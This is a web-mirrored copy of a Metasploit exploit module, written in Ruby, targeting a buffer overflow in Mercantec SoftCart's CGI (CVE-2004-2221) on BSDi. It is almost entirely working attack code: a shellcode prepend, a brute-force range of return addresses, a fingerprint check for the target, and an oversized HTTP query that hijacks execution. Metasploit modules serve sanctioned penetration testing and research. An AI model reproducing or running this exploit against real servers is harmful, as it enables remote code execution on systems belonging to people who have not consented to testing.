Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/bsdi/softcart/mercantec_softcart.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Brute
10
include Msf::Exploit::Remote::HttpClient
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Mercantec SoftCart CGI Overflow',
17
'Description' => %q{
18
This is an exploit for an undisclosed buffer overflow
19
in the SoftCart.exe CGI as shipped with Mercantec's shopping
20
cart software. It is possible to execute arbitrary code
21
by passing a malformed CGI parameter in an HTTP GET
22
request. This issue is known to affect SoftCart version
23
4.00b.
24
},
25
'Author' => [ 'skape', 'trew' ],
26
'References' => [
27
[ 'CVE', '2004-2221'],
28
[ 'OSVDB', '9011'],
29
[ 'BID', '10926'],
30
],
31
'Privileged' => false,
32
'Payload' => {
33
'Space' => 1000,
34
'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b\x7d\x28\x29\x3f\x5d\x5b\x00",
35
'MinNops' => 16,
36
'Prepend' => "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00\x00\x07\x00",
37
'PrependEncoder' => "\x83\xec\x7f"
38
},
39
'Platform' => 'bsdi',
40
'Targets' => [
41
[
42
'BSDi/4.3 Bruteforce',
43
{
44
'Bruteforce' =>
45
{
46
'Start' => { 'Ret' => 0xefbf3000 },
47
'Stop' => { 'Ret' => 0xefbffffc },
48
'Step' => 0
49
}
50
},
51
],
52
],
53
'DisclosureDate' => '2004-08-19',
54
'DefaultTarget' => 0,
55
'Notes' => {
56
'Stability' => [CRASH_SERVICE_RESTARTS],
57
'Reliability' => [REPEATABLE_SESSION],
58
'SideEffects' => [IOC_IN_LOGS]
59
}
60
)
61
)
62
63
register_options(
64
[
65
OptString.new('URI', [ false, 'The target CGI URI', '/cgi-bin/SoftCart.exe' ])
66
]
67
)
68
end
69
70
def brute_exploit(address)
71
if !@mercantec
72
res = send_request_raw({
73
'uri' => normalize_uri(datastore['URI'])
74
}, 5)
75
@mercantec = res && res.body && res.body =~ /Copyright.*Mercantec/
76
fail_with(Failure::NotFound, 'The target is not a Mercantec CGI') if !@mercantec
77
end
78
79
buffer =
80
'MAA+scstoreB' +
81
rand_text_alphanumeric(512) +
82
[address['Ret']].pack('V') +
83
'MSF!' +
84
[address['Ret'] + payload.encoded.length].pack('V') +
85
payload.encoded
86
87
print_status("Trying #{'%.8x' % address['Ret']}...")
88
send_request_raw({
89
'uri' => normalize_uri(datastore['URI']),
90
'query' => buffer
91
}, 5)
92
93
handler
94
end
95
end
96
97